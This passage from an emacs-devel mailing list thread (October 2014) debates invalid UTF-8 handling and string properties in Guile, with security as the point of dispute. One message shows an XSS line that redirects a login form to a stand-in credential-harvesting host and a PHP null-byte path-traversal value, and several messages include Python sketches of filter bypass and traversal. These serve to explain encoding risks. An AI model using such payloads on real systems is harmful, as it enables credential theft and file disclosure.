I stand by my statement above, regardless of what input is fed into the
UTF-8 encoder, and I think I've said enough to make my point.  You are
immovable, as always, and I don't want to waste any more time on this.

You can add this to your long list of reasons why you consider me a bad
maintainer for Guile.

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08 15:03                                                                   ` Mark H Weaver
@ 2014-10-08 15:11                                                                     ` Eli Zaretskii
  2014-10-08 15:54                                                                     ` David Kastrup
  1 sibling, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-08 15:11 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, rms, schwab, dmantipov, emacs-devel, handa, monnier, stephen

> From: Mark H Weaver <mhw@netris.org>
> Date: Wed, 08 Oct 2014 11:03:51 -0400
> Cc: Richard Stallman <rms@gnu.org>, Andreas Schwab <schwab@suse.de>,
> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
> 	monnier@iro.umontreal.ca, Eli Zaretskii <eliz@gnu.org>, stephen@xemacs.org
> 
> You are immovable, as always

That was uncalled-for, and actually goes both ways, you know.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08 15:03                                                                   ` Mark H Weaver
  2014-10-08 15:11                                                                     ` Eli Zaretskii
@ 2014-10-08 15:54                                                                     ` David Kastrup
  2014-10-09  3:26                                                                       ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-08 15:54 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Mark H Weaver <mhw@netris.org> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> Mark H Weaver <mhw@netris.org> writes:
>>
>>> David Kastrup <dak@gnu.org> writes:
>>>> You cannot successfully cater for clueless application programmers.
>>>
>>> It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8.
>>
>> We are not talking about "producing" but "reproducing" here.
>
> I stand by my statement above, regardless of what input is fed into the
> UTF-8 encoder, and I think I've said enough to make my point.  You are
> immovable, as always, and I don't want to waste any more time on this.

Shrug.  It's hard to move me when I have been around in similar
circumstances and when I've been exposed to the consequences of
similar decisions before.

AUCTeX's prv-xemacs.el contains

(defcustom preview-buffer-recoding-alist
  (if (and (= emacs-major-version 21)
           (< emacs-minor-version 5))
      '((utf-8-unix . raw-text-unix)
        (utf-8-dos . raw-text-dos)
        (utf-8-mac . raw-text-mac)
        (utf-8 . raw-text)))
  "Translate buffer encodings into process encodings.
TeX is sometimes bad dealing with 8bit encodings and rather bad
dealing with multibyte encodings.  So the process encoding output
might need to get temporarily reprocessed into the original byte
stream before the buffer characters can be identified.  XEmacs
21.4 is rather bad at preserving incomplete multibyte characters
in that process.  This variable makes it possible to use a
reconstructable coding system in the run buffer instead.  Specify
an alist of base coding system names here, which you can get
using

  \(coding-system-name (coding-system-base buffer-file-coding-system))

in properly detected buffers."
  :group 'preview-latex
  :type '(repeat (cons symbol symbol)))

(defun preview-buffer-recode-system (base)
  "This is supposed to translate unrepresentable base encodings
 into something that can be used safely for byte streams in the
 run buffer.  XEmacs mule-ucs is so broken that this may be
 needed."
  (or (cdr (assq (coding-system-name base)
                 preview-buffer-recoding-alist))
      base))


as opposed to prv-emacs.el's

(defsubst preview-buffer-recode-system (base)
  "This is supposed to translate unrepresentable base encodings
into something that can be used safely for byte streams in the
run buffer.  A noop for Emacs."
  base)


What you don't see is the associated man-month of bug reports, hassles,
head-scratching, debugging, solution-finding, abstracting and boiling
down into a solution.


I've been at the receiving end of the "reproducing the input bytes
faithfully is not a priority" mindframe, and it is costly.  If I am
immovable here, it's because I'm old.  I've been a programmer long
enough in this game to know that "but when _we_ do that, everything will
be different" pans out rarely enough.

And it's not like I'm not getting bitten at the current point of time
while trying to get LilyPond (and thus C++ strings) play well with
GUILE2 without buying into massive conversion overhead and/or possible
column counting mismatches.

We write out PostScript code.  A mixture of material in Latin1, UTF16BE,
and binary.  We read in utf8 code and have a flex scanner working on
in-memory byte streams it shares with the GUILE reader interpreting it
in UTF-8.

It's not like I don't know what I am talking about here.

> You can add this to your long list of reasons why you consider me a
> bad maintainer for Guile.

To be honest, I was not even aware you were maintainer for GUILE.  There
are several committers to the stable/2.0 branch (and sometimes merging
from there to master), and there is Andy Wingo committing to master in
occasional spurts of commits of highly experimental character that are
not discussed on any public list.  While I am clueless about the
official roles of the various developers, the resulting workflows look
more evolved than designed.  I can hardly blame you for something that
you do not appear to have much choice in.  Many GNU maintainers are
sovereigns without subjects or a castle, mostly endowed with the power
to let the sun rise in the morning.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  2:09                                           ` Stephen J. Turnbull
  2014-10-08  3:07                                             ` David Kastrup
@ 2014-10-09  1:19                                             ` Richard Stallman
  2014-10-09  3:56                                               ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-09  1:19 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

    I just want to make sure that Emacs developers in general are aware
    that if string properties are added to Guile itself, Emacs will be a
    potential vector for attacks.

If you demonstrate that this claim is valid, I will be concerned.

     For example, by providing a "back
    channel" for malicious information

So what?  How would this affect what anyone can do?  There are many
other channels to communicate data from one part of a Scheme program
to another, so how would this additional channel make a practical
difference?  Why object to adding a window in a wall that has so many
doorways already?

If you show me that there is some real and useful form
of security, which adding string property lists would break,
you could convince me that there is a real issue of security here.

    What I advocate is that string properties should be implemented by
    using Guile facilities for defining types, not by changing Guile.

It would be a pain in the neck if Emacs strings were something
different from Guile strings.  If you want to argue that security
justifies this pain, you need to show it is real security and really
does a useful job.





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  7:13                                                     ` Eli Zaretskii
@ 2014-10-09  1:19                                                       ` Richard Stallman
  2014-10-09  7:21                                                         ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-09  1:19 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

Regarding files:

    We do ask, but only at buffer save time.  Asking questions when
    visiting a file is perceived as a nuisance, because our heuristics
    that detect these cases are imperfect and tend to have high enough
    false positive rate that annoys people.

Asking about invalid UTF-8 in a file could be a nuisance, but how much
of a nuisance depends on the details of what we do.  Since this has
some security implications, it is worth a small amount of nuisance.

What exactly did we try before?

Meanwhile, in a separate message I wrote about non-file operations:

    > We can set the defaults for those non-file interfaces so as to reject
    > invalid UTF-8 sequences.  Then a program could specify to override the
    > default and allow them.

    That has been tried (not with UTF-8, but I don't think this matters),
    and failed miserably.

I don't think we are talking about the same thing.  I am talking about Lisp
functions to do conversions on text that does NOT come from files.
You seem to be talking about operations on files:

			   The experience taught us that Emacs users
    definitely don't want Emacs to do _anything_ about the unmodified
    parts of text, except copy it verbatim.  Even the question we ask at
    buffer-save time is sometimes reported as an annoyance.

It looks like you're grouping the two cases together,
while I am treating them separately.





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  3:07                                             ` David Kastrup
@ 2014-10-09  3:06                                               ` Stephen J. Turnbull
  2014-10-09  3:44                                                 ` David Kastrup
  2014-10-10 14:23                                                 ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09  3:06 UTC (permalink / raw)
  To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

David Kastrup writes:

 > Newsflash: Emacs 19 has been released in the mean time.  That's good
 > since we have an example we can study now with regard to the problems
 > text properties may cause.

Newsflash: we're not talking about text properties in Emacs, which has
historically been hostile to both embedding in other apps and to FFIs,
and is not normally used as a network daemon, but instead is usually
controlled by the user who owns the resources Emacs manipulates, and
in most cases has little malice toward himself.

We're talking about text properties in Guile, which is designed for
embedding and extension (including wrapping foreign functions).  A
Guile with text properties hasn't been written, let alone released
AFAIK.  I dunno about the "network daemon" part, but Mark mentioned
that as a target application area for Guile.

It would be "nice" and "efficient" for Guile to implement properties
natively so that Emacs could just use those, but Mark is correct to
worry that those properties would be used to bypass validation modules
written for pre-property Guile versions.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08 15:54                                                                     ` David Kastrup
@ 2014-10-09  3:26                                                                       ` Stephen J. Turnbull
  2014-10-09  4:14                                                                         ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09  3:26 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	monnier, Andreas Schwab, Eli Zaretskii

David Kastrup writes:

 > I've been at the receiving end of the "reproducing the input bytes
 > faithfully is not a priority" mindframe, and it is costly.

XEmacs is irrelevant -- it simply doesn't possess the technology.  It
*is* a goal for us, I've tried, and that code is *hairy*, I failed.
So all your examples of pain you've personally suffered are irrelevant.

Nobody here is advocating "not a priority."  Engineering faithful
roundtripping isn't a priority for Emacs only because it's already
possible and robust.  I'm assuming that will continue to be the case
in a Guile-based Emacs.  (If not, sure, that needs to be fixed.
Nobody is saying otherwise, and I've made that explicit several
times.)

So the only question is "what is the default."  Please stop trying to
make this into anything else.

You advocate a default that is convenient for the app programmer, who
saves one project-wide "sed -i -e s/utf-8/utf-8-with-rawbytes/ *" to
achieve the same degree of insecurity and reproducibility his app
would have with the default you prefer.

We advocate a default that is safer for the user, who may lose their
life savings if a filter for 419 phish fails because a character is
encoded with "long" UTF-8, and fails to match the regexp which expects
the character and not rawbytes.  I don't know that there are any Emacs
MUA users who have ever fallen for a phishing message, but I assure
you that I personally have observed "long" UTF-8 in messages that are
otherwise duplicates of correctly encoded spams.  Those bastards don't
miss a trick.
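
The filter scenario above can be made concrete.  The following is a
Python sketch, not Emacs or Guile code; the pattern, the sample message
and both function names are invented for illustration, and
"surrogateescape" stands in for decoding invalid bytes to raw-byte
characters.

```python
import re

PATTERN = re.compile(r"lottery")

# 0xC1 0xAF is the overlong two-byte form of "o" (U+006F).
OVERLONG_O = b"\xc1\xaf"
MESSAGE = b"You won the l" + OVERLONG_O + b"ttery"


def permissive_filter(raw: bytes) -> bool:
    """Decode while preserving invalid bytes, then match the pattern."""
    text = raw.decode("utf-8", errors="surrogateescape")
    return PATTERN.search(text) is not None


def strict_filter(raw: bytes) -> bool:
    """Treat invalid UTF-8 as suspicious in its own right."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return True
    return PATTERN.search(text) is not None


missed = not permissive_filter(MESSAGE)  # the overlong "o" hides the keyword
caught = strict_filter(MESSAGE)          # strict decoding flags the message
```

The permissive filter sees two placeholder characters where the "o"
should be, so the regexp does not match; a later, more lenient consumer
that accepts overlong forms would still display "lottery" to the user.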




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  3:06                                               ` Stephen J. Turnbull
@ 2014-10-09  3:44                                                 ` David Kastrup
  2014-10-09  7:16                                                   ` Stephen J. Turnbull
  2014-10-10 14:23                                                 ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-09  3:44 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> David Kastrup writes:
>
>  > Newsflash: Emacs 19 has been released in the mean time.  That's good
>  > since we have an example we can study now with regard to the problems
>  > text properties may cause.
>
> Newsflash: we're not talking about text properties in Emacs, which has
> historically been hostile to both embedding in other apps and to FFIs,
> and is not normally used as a network daemon,

It is used as a network application (I mean, what else to use as news
and mail reader?).  There are currently discussions on the list about
the way to do TLS in a secure manner.

> We're talking about text properties in Guile, which is designed for
> embedding and extension (including wrapping foreign functions).  A
> Guile with text properties hasn't been written, let alone released
> AFAIK.  I dunno about the "network daemon" part, but Mark mentioned
> that as a target application area for Guile.

Text properties are not in files or network streams.  They will not
magically materialize and cause trouble.

> It would be "nice" and "efficient" for Guile to implement properties
> natively so that Emacs could just use those, but Mark is correct to
> worry that those properties would be used to bypass validation modules
> written for pre-property Guile versions.

Sigh.  At any rate, this is basically a non-issue since GUILE is
perfectly capable of supporting custom extensible string type stacks on
the existing commands, just as it provides a custom extensible numeric
type stack.  Its object programming system GOOPS has been designed for that
sort of extensibility.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-09  1:19                                             ` Richard Stallman
@ 2014-10-09  3:56                                               ` Stephen J. Turnbull
  2014-10-09  4:49                                                 ` Mike Gerwitz
  2014-10-10 14:23                                                 ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09  3:56 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

Richard Stallman writes:

 > If you demonstrate that this claim is valid, I will be concerned.

*sigh*  Be unconcerned.  The world is a *lot* more hostile today than
it was in the days when you posted your passwords on the 'net.

 > It would be a pain in the neck if Emacs strings were something
 > different from Guile strings.

Sure.  Security comes at a cost.  That's part of why credit cards charge
a minimum of 5% over prime rate, and why people lose hundreds of
millions of dollars a year to Internet scams: somebody didn't want to
pay that cost, so imposed the risk on others.

The risk is almost invisibly small in a monolithic Emacs, it's true.
But a Guile-based Emacs is no longer monolithic.  It becomes a
component directly connected to a much larger system of Guile modules,
whose purposes and uses the Emacs developers do not know.  Evidently
some leading Emacs developers are unwilling to care at all about those
unknown purposes and use cases.  If I were a Guile maintainer, I would
be concerned about adding features requested by Emacs.

 > If you want to argue that security justifies this pain,

Sorry, no.  If you want to use a Guile maintained by Mark, you're
going to have to convince him that the benefits of having Guile
implement string properties natively (rather than in the Emacs module
running on top of Guile) are worth overriding his justified paranoia.
I'm trying to convince you and other Emacs developers that you're
going to have to be more sympathetic to security if you want to get
such features into Guile.

 > you need to show it is real security and really does a useful job.

I suspect I can't give you a convincing example, because I haven't
studied the Guile modules "at risk", and in any case, most real risks
would require Guile modules that take advantage of text properties (of
which there are obviously none) or an Emacs -> Guile security code ->
Emacs passage, where the second Emacs instance "trusts" the code
because the Guile security code has validated it, but that's not
possible yet either.

However, here are a couple of analogies.  Even a feature as simple as
".." representing the parent directory has been used in disastrous
network breakins.  The danger of ".." is obvious in retrospect, but
the developers of web servers (several) were taken unaware because
they used system calls to traverse paths, and those calls
automatically implemented "..".  Sensitive user data (such as
password files) was leaked.
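
A minimal sketch of the ".." problem described above, in Python rather
than the C of the affected servers.  WEB_ROOT, naive_resolve and
checked_resolve are hypothetical names, and posixpath.normpath merely
stands in for the path resolution that the system calls performed.

```python
import posixpath

WEB_ROOT = "/srv/www"  # hypothetical document root


def naive_resolve(requested):
    # Join and normalize, letting ".." be interpreted for us,
    # much as the servers did by delegating to system calls.
    return posixpath.normpath(posixpath.join(WEB_ROOT, requested))


def checked_resolve(requested):
    # Resolve first, then refuse anything that escaped the root.
    resolved = naive_resolve(requested)
    if resolved != WEB_ROOT and not resolved.startswith(WEB_ROOT + "/"):
        raise ValueError("path escapes document root: %r" % requested)
    return resolved
```

With these definitions, naive_resolve("../../etc/passwd") returns
"/etc/passwd", while checked_resolve raises ValueError for the same
request.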

Or how about the recent bash lossage?  s-expressions are just Lisp
data, and could be placed in a property.  Older security code that
does not validate properties might pass arbitrary code (because it
doesn't look at it) to a module that expects to receive a symbol,
eval's it, and voila! you're owned, just as any CGI implemented as a
shell script on a host where /bin/sh is a symlink to bash can own you.
Evaluating functions stored in environment variables is not a POSIX sh
feature; if bash's "sh compatibility" mode actually implemented
compatibility, this exploit would be impossible.  AFAIK setting
POSIX_ME_HARDER doesn't help.
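
The property scenario can be sketched as follows.  This is only an
illustration in Python: PropString is a hypothetical
string-with-properties type, not a Guile or Emacs API, and the two
validators are assumptions about what "older" and "property-aware"
security code might look like.

```python
from dataclasses import dataclass, field


@dataclass
class PropString:
    # Hypothetical string carrying extra properties alongside its text.
    text: str
    props: dict = field(default_factory=dict)


def legacy_validate(s):
    # Written before properties existed: inspects only the text.
    return s.text.isidentifier()


def careful_validate(s):
    # Also refuses any property payload it does not understand.
    return s.text.isidentifier() and not s.props


payload = PropString("safe_name", {"on-click": "(delete-everything)"})
```

Here legacy_validate(payload) accepts the value because the text looks
like a harmless symbol, while careful_validate(payload) rejects it
because of the unexamined property.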

So there you are.  That's the best I can do.





* Re: Emacs Lisp's future
  2014-10-09  3:26                                                                       ` Stephen J. Turnbull
@ 2014-10-09  4:14                                                                         ` David Kastrup
  2014-10-09  7:31                                                                           ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-09  4:14 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	monnier, Andreas Schwab, Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> We advocate a default that is safer for the user,

GUILE is not a user application but a programming language.

> who may lose their life savings if a filter for 419 phish fails

Can we have terrorism with that scaremongering?

> because a character is encoded with "long" UTF-8, and fails to match
> the regexp which expects the character and not rawbytes.

I am glad that Emacs and sed and other utilities don't trash PostScript
files by default in order to save me from phishing.

> I don't know that there are any Emacs MUA users who have ever fallen
> for a phishing message, but I assure you that I personally have
> observed "long" UTF-8 in messages that are otherwise duplicates of
> correctly encoded spams.  Those bastards don't miss a trick.

So?  Does that mean that string operations should throw an error when
encountering $$$$$$$$$$$$$ in a string?  To save the user from scams?

If you keep confusing the responsibilities of platform, application and
user, you arrive at a system you constantly have to work around
because it knows better than you what you want.

A network application that throws exceptions internally when fed
non-UTF-8 byte combinations is an attack vector for denial-of-service
attacks.  And since the naive programmer does not expect exceptions for
just reading strings, this is a very real danger.  And since GUILE is an
extension language, implicit conversions for C/GUILE call gates are hard
to avoid, and when every call gate is locked towards passing strings
representing arbitrary data, you will not be able to use libraries
without having access to the semantics of every call gate.
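
The denial-of-service concern can be illustrated with a small Python
sketch (an analogy, not Guile code; process_all and
process_all_guarded are hypothetical names).  A strict decoder raises
on the first malformed message, and a caller that did not expect that
never reaches the remaining ones.

```python
def process_all(messages):
    # Naive loop: assumes decoding a string can never fail.
    handled = []
    for raw in messages:
        handled.append(raw.decode("utf-8").strip())  # may raise
    return handled


def process_all_guarded(messages):
    # The application decides what to do with malformed input.
    handled, rejected = [], []
    for raw in messages:
        try:
            handled.append(raw.decode("utf-8").strip())
        except UnicodeDecodeError:
            rejected.append(raw)
    return handled, rejected


inbox = [b"hello ", b"bad \xff byte", b" world"]
```

Calling process_all(inbox) aborts with UnicodeDecodeError before
" world" is seen; process_all_guarded(inbox) handles the two valid
messages and sets the malformed one aside.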

At any rate, there is no point to this discussion.  It tends to solve
itself in practice by developers at some point of time becoming tired of
ever the same application programmer level problems getting reported,
and application programmers becoming tired of ever the same developer
attitude regarding internals that refuse to "simply work".

At least I am still allowed to call cons without triggering an error
when the second argument is not a list.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-09  3:56                                               ` Stephen J. Turnbull
@ 2014-10-09  4:49                                                 ` Mike Gerwitz
  2014-10-09  8:00                                                   ` Eli Zaretskii
  2014-10-10 14:23                                                   ` Richard Stallman
  2014-10-10 14:23                                                 ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Mike Gerwitz @ 2014-10-09  4:49 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz


On Thu, Oct 09, 2014 at 12:56:42PM +0900, Stephen J. Turnbull wrote:
> Richard Stallman writes:
> 
>  > If you demonstrate that this claim is valid, I will be concerned.
> 
> *sigh*  Be unconcerned.  The world is a *lot* more hostile today than
> it was in the days when you posted your passwords on the 'net.

Agreed. Character encoding attacks are also something that has been
exploited "in the wild". Some examples include:

  - UTF-7 character encoding to bypass filters[0] (e.g. for XSS);
  - IIS WebDAV validation exploit (CVE-2009-1535);[1]
  - CAPEC-80: Using UTF-8 Encoding to Bypass Validation Logic;[2] and
  - Google's XSS vulnerability, related to the first item in this list.[3]

Note that not all of the above may be applicable to the specifics of this
discussion---the point is to convey, generally, that character encoding
poses serious threats when improperly handled. Though this discussion seems
to be about what is "improper".
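
As a rough Python illustration of the kind of bypass listed above: a
filter that inspects raw bytes can be defeated if a later stage decodes
overlong sequences leniently.  lenient_decode is a deliberately naive,
hypothetical decoder written for this sketch; it is not how any
particular product decodes UTF-8.

```python
def lenient_decode(data):
    # Naive decoder: accepts two-byte sequences without rejecting
    # overlong forms, and treats every other byte as Latin-1.
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def byte_filter_allows(data):
    # Filter that looks only for the literal bytes of "../".
    return b"../" not in data


evil = b"..\xc0\xafetc/passwd"  # 0xC0 0xAF is an overlong form of "/"
```

The filter passes evil, yet lenient_decode(evil) produces
"../etc/passwd".  A strict decoder (Python's own evil.decode("utf-8"))
rejects the input instead.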

See "Secure Programming for Linux [sic] and Unix HOWTO".[4]

The Unicode Consortium also has a security report[5] that mentions, among
other important concepts, deletion of code points and handling of "illegal"
input byte sequences.

With regards to passing raw input to other systems: this isn't necessarily
Unicode related (unless an invalid sequence contains a null byte), but
serves to illustrate the point that Mark is trying to make: there is a
well-known issue in PHP whereby passing a null byte as a parameter to a
script (e.g. via HTTP GET/POST) opens up a number of attacks.  Specifically,
PHP handles null bytes in strings (by storing the string length as part of
the struct that holds the string). However, it makes calls directly to libc.
So, if an unvalidated input $foo contains "../../../../etc/group\000", and
PHP makes a call to `fopen' with the path "/webroot/modules/$foo/index.php",
the result would be opening "/webroot/modules/../../../../etc/group".
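
The truncation can be simulated in Python (a sketch only; c_string_view
is a hypothetical helper that mimics how a NUL-terminated C API reads a
buffer, and no PHP or libc code is involved).

```python
import posixpath


def c_string_view(path):
    # What a NUL-terminated C API sees: everything before the first NUL.
    return path.split(b"\0", 1)[0]


foo = b"../../../../etc/group\0"
script_path = b"/webroot/modules/" + foo + b"/index.php"

seen_by_libc = c_string_view(script_path)
opened = posixpath.normpath(seen_by_libc)
```

The length-counted string still ends in "/index.php", but seen_by_libc
is b"/webroot/modules/../../../../etc/group", which normalizes to
b"/etc/group".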

I have the most experience developing web applications, where character
encoding exploits are common.[6]

> So there you are.  That's the best I can do.

I can dig up more examples, but hopefully some of these help to illustrate
the severity of ignoring character encoding concerns.

* * *

Aside: For those who don't know what XSS is: the issue is that, if input
from the user is not properly validated/filtered, and is at some point
output back to a user, that output could be interpreted as HTML, JavaScript,
CSS, etc. So if XSS filters are bypassed using the aforementioned methods,
perhaps the user will output `<script>document.forms[0].action =
"http://login-harvester.foo";</script>', which might change a login form,
say, to post user credentials to a remote website.

[0]: http://en.wikipedia.org/wiki/UTF-7#Security
[1]: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1535
[2]: https://capec.mitre.org/data/definitions/80.html
[3]: http://shiflett.org/blog/2005/dec/googles-xss-vulnerability
[4]: http://www.tldp.org/HOWTO/Secure-Programs-HOWTO/character-encoding.html
[5]: http://www.unicode.org/reports/tr36/
[6]: https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet

-- 
Mike Gerwitz
Free Software Hacker | GNU Maintainer
http://mikegerwitz.com
FSF Member #5804 | GPG Key ID: 0x8EE30EAB



* Re: Emacs Lisp's future
  2014-10-09  3:44                                                 ` David Kastrup
@ 2014-10-09  7:16                                                   ` Stephen J. Turnbull
  2014-10-09  7:47                                                     ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09  7:16 UTC (permalink / raw)
  To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

David Kastrup writes:
 > "Stephen J. Turnbull" <stephen@xemacs.org> writes:

 > > Newsflash: we're not talking about text properties in Emacs, which has
 > > historically been hostile to both embedding in other apps and to FFIs,
 > > and is not normally used as a network daemon,
 > 
 > It is used as a network application (I mean, what else to use as news
 > and mail reader?).  There are currently discussions on the list about
 > the way to do TLS in a secure manner.

That's simply nonsense as an argument here.  Until you demonstrate at
least a shred of understanding of something as fundamental as the
differences in security requirements and attack surfaces of network
*servers* and network *clients*, there's no point in discussing your
statements further.

 > Text properties are not in files or network streams.  They will not
 > magically materialize and cause trouble.

"Magically", no.  "Maliciously", yes, we do have to worry about that.
Again, your evident ignorance of network threat models and their
historical realizations (both as "theoretical" CVEs and as successful
exploits) is appalling.

 > Sigh.  At any rate, this is basically a non-issue since GUILE is
 > perfectly capable of supporting custom extensible string type stacks on
 > the existing commands

Aha, a convert!  (Yes, I said that already in different terms.)





* Re: Emacs Lisp's future
  2014-10-09  1:19                                                       ` Richard Stallman
@ 2014-10-09  7:21                                                         ` Eli Zaretskii
  2014-10-09  7:52                                                           ` David Kastrup
                                                                             ` (2 more replies)
  0 siblings, 3 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-09  7:21 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Wed, 08 Oct 2014 21:19:54 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     We do ask, but only at buffer save time.  Asking questions when
>     visiting a file is perceived as a nuisance, because our heuristics
>     that detect these cases are imperfect and tend to have a false
>     positive rate high enough to annoy people.
> 
> Asking about invalid UTF-8 in a file could be a nuisance, but how much
> of a nuisance depends on the details of what we do.  Since this has
> some security implications, it is worth a small amount of nuisance.

That wasn't what users felt, overwhelmingly.

> What exactly did we try before?

AFAIR, we tried converting raw bytes into valid non-ASCII characters,
and perhaps also replacing them with the equivalent of u+FFFD, the
Unicode "replacement character".

> Meanwhile, in a separate message I wrote about non-file operations:

Well, you said "frile", which confused me ;-)  However, ...

>     > We can set the defaults for those non-frile interfaces so as to reject
>     > invalid UTF-8 sequences.  Then a program could specify to override the
>     > default and allow them.
> 
>     That has been tried (not with UTF-8, but I don't think this matters),
>     and failed miserably.
> 
> I don't think we are talking about the same thing.  I am talking about Lisp
> functions to do conversions on text that does NOT come from files.

... Emacs treats all of these cases the same.  For text we are going
to send to a process or network stream, we ask the above-mentioned
question at the time we encode the internal representation into the
external byte stream we are about to send.  E.g., you can see that in
action in sending mail if you insert some raw bytes into a mail
message in a *mail* buffer, and then try sending it.  There's no file
involved here, at least not as far as Emacs is concerned, and yet you
will see the same prompt asking you to select a proper encoding.

> You seem to be talking about operations on files:
> 
> 			   The experience taught us that Emacs users
>     definitely don't want Emacs to do _anything_ about the unmodified
>     parts of text, except copy it verbatim.  Even the question we ask at
>     buffer-save time is sometimes reported as an annoyance.
> 
> It looks like you're grouping the two cases together,
> while I am treating them separately.

Emacs treats them both the same way, and uses the same low-level
primitives that generally don't know the purpose of the byte stream
they are encoding or decoding.  All they know is whether the source
resp. destination is a buffer, a string, or a gap in the buffer text,
which is insufficient to distinguish between the 2 use cases you are
trying to treat separately.




* Re: Emacs Lisp's future
  2014-10-09  4:14                                                                         ` David Kastrup
@ 2014-10-09  7:31                                                                           ` Stephen J. Turnbull
  2014-10-09  8:05                                                                             ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09  7:31 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	monnier, Andreas Schwab, Eli Zaretskii

David Kastrup writes:

 > > who may lose their life savings if a filter for 419 phish fails
 > 
 > Can we have terrorism with that scaremongering?

Are you really unaware that such exploits happen every day?  You're
not the only programmer who deprecates security because *your*
applications are "secure enough" and it "can't" happen to you, you
know.[1]  That's *why* those exploits are possible -- because some of
those good honest folks were *dead wrong*, and all too often we don't
know which ones were wrong until somebody gets scammed.

 > If you keep confusing the responsibilities of platform, application
 > and user, you arrive at a system you constantly have to work around
 > because it knows better than you what you want.

Unfortunately, I'm not the one who lacks understanding.  I'm well
aware that security is costly in convenience and functionality.
Nevertheless, I am willing to suffer those losses (which will be far
less than your exaggerated fears), and advocate imposing them on you
as well, because I'm aware of the consequences of doing otherwise.


Footnotes: 
[1]  Heck, that's what the devils at the top of Tokyo Electric Power
Co said as their Fukushima reactor blew its own roof off, and they
*continue* to say that such accidents are "unimaginable".




* Re: Emacs Lisp's future
  2014-10-08  0:47                                                   ` Richard Stallman
  2014-10-08  7:13                                                     ` Eli Zaretskii
@ 2014-10-09  7:36                                                     ` David Kastrup
  2014-10-10 14:25                                                       ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-09  7:36 UTC (permalink / raw)
  To: Richard Stallman
  Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen

Richard Stallman <rms@gnu.org> writes:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
>     UTF-8 is defined as not containing "overlong" sequences, so Emacs
>     decodes them into two raw-byte indicating characters, one indicating
>     0xC0, one indicating 0xA2.  When encoding, it reassembles them into
>     0xC0 0xA2.
>
